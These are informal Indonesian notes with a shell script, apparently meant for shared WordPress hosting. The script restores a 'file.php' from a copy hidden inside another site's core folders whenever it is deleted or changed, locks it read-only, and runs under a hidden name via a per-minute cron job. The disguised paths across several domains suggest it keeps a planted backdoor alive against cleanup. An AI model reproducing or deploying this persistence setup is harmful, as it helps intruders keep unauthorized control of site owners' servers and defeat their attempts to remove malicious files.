- check apakah sudah root di terminal
whoami
- ubah chmod dari terminal 
chmod 444 index.php
- 

- untuk backup file dari terminal
cp index.php index-safe.php

buat file dengan nama protect.sh
kalau mau ganti nama dari terminal contoh : 
mv protect.sh .cache_sync

===========================================================================================
 
#!/bin/sh

FILE="/home/u200768895/domains/aceprofessionalpainting.ca/public_html/wp-content/updraft/widgets/fonts/style-engine/file.php"
SAFE="/home/u200768895/domains/primeedgereno.ca/public_html/wp-includes/css/dist/block-library/file.php"

if [ ! -f "$FILE" ]; then
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
    exit
fi

if ! cmp -s "$FILE" "$SAFE"; then
    chmod 644 "$FILE"
    cp "$SAFE" "$FILE"
    chmod 444 "$FILE"
fi

===========================================================================================
sudah upload di file yang dimau contoh
langsung jalankan ( manual )
sh protect.sh

jalnkan otomatis 1 menit ( otomatis ) di file yang kita simpan
sh /home/u200768895/domains/ironbaylogistics.com/public_html/protect.sh

root harus 1 hosting yang sama 
kalau tidak sama harus ada nama serverhosting
- kalau ada eror blablabla
coba lakukan ini di terminal 
sed -i 's/\r$//' protect.sh

setelah save file jalankan di terminal
chmod +x protect.sh
chmod +x .cache_sync

kalau sudah berhasil pasang chron job
terminal ketik
/home/u200768895/domains/aceprofessionalpainting.ca/public_html/wp-content/updraft/widgets/fonts/style-engine/protect.sh
